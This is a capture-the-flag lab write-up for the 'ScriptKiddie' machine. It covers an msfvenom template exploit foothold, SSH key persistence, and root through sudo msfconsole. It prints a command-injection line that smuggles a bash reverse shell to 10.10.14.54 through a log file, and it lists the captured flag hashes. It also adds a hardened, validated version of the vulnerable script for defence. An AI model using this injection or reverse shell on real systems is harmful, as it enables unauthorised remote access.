ScriptKiddie
Enumeration
Ports and Services
Software Installed:
- NMap 7.80
Website:
Nmap Scan Results:
Initial Foothold
The payloads tool uses msfvenom… version unknown.
There is an exploit https://www.exploit-db.com/exploits/49491 where you can
inject commands into a template file.
Used msfconsole to generate a custom apk file:
Uploaded it into the payload section and received a shell:
User.txt Proof Screenshot
User.txt Contents:
be9a8fa46d406c5bb5e4452d76f539dd
Notes:
Created an SSH keypair, uploaded id_rsa.pub to the local user's authorized keys, and
SSH'd in.
Privilege Escalation
Script in /home/pwn called scanlosers.sh:
Looks like it is pulling info from a log file called hackers in the kid directory
and running nmap against it.
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
As user kid:
echo " test ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.54/7777 0>&1' #" >> hackers
Received a shell as pwn:
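The injection works because scanlosers.sh pastes the logged value into a string that `sh -c` parses again. The following is an added example, not the box's script or part of the original notes: a hardened sketch of the same loop, assuming the log should only ever carry IPv4 addresses. The function names, the sample log lines and the file name in the usage comment are constructed for illustration.

```shell
#!/bin/sh
# Added example: hardened take on the scanlosers.sh loop (not the box's script).
# Assumption: field 3 onward of each log line must be a bare IPv4 address.

# Succeeds only for a dotted quad with every octet in 0..255.
# The body is a subshell, so the IFS change and `set --` stay local.
valid_ipv4() (
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) exit 1 ;;
    esac
    IFS=.
    set -- $1                      # split on dots; only digits and dots remain
    [ $# -eq 4 ] || exit 1
    for octet in "$@"; do
        [ ${#octet} -le 3 ] && [ "$octet" -le 255 ] || exit 1
    done
)

# Print the unique, validated targets from log file $1; report the rest on stderr.
extract_targets() {
    cut -s -d' ' -f3- < "$1" | sort -u | while IFS= read -r ip; do
        if valid_ipv4 "$ip"; then
            printf '%s\n' "$ip"
        else
            printf 'rejected log entry: %s\n' "$ip" >&2
        fi
    done
}

# Scan validated targets from log $1 into directory $2. nmap is started
# directly with its own argument vector, never through `sh -c`.
scan_targets() {
    extract_targets "$1" | {
        while IFS= read -r ip; do
            nmap --top-ports 10 -oN "$2/$ip.nmap" "$ip" >/dev/null 2>&1 &
        done
        wait
    }
}

# Constructed sample log: two leading fields, then the logged address.
sample_log() {
    printf '%s\n' '[2021-01-01 00:00:00] 10.10.14.2' \
        '[2021-01-01 00:00:09] 999.1.1.1' ' test ;id #'
}

# Usage (hypothetical file name): sh scan_hardened.sh LOGFILE OUTDIR
if [ $# -eq 2 ]; then scan_targets "$1" "$2"; fi
```

Validation alone would have stopped the entry written by kid; dropping `sh -c` removes the second shell parse, so a value that slipped through would still reach nmap as a single argument.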
User pwn has NOPASSWD sudo on msfconsole:
Ran sudo msfconsole and received a root shell.
Root Screenshot Here:
Root.txt Contents:
86301814fac8669d573182b79117d51b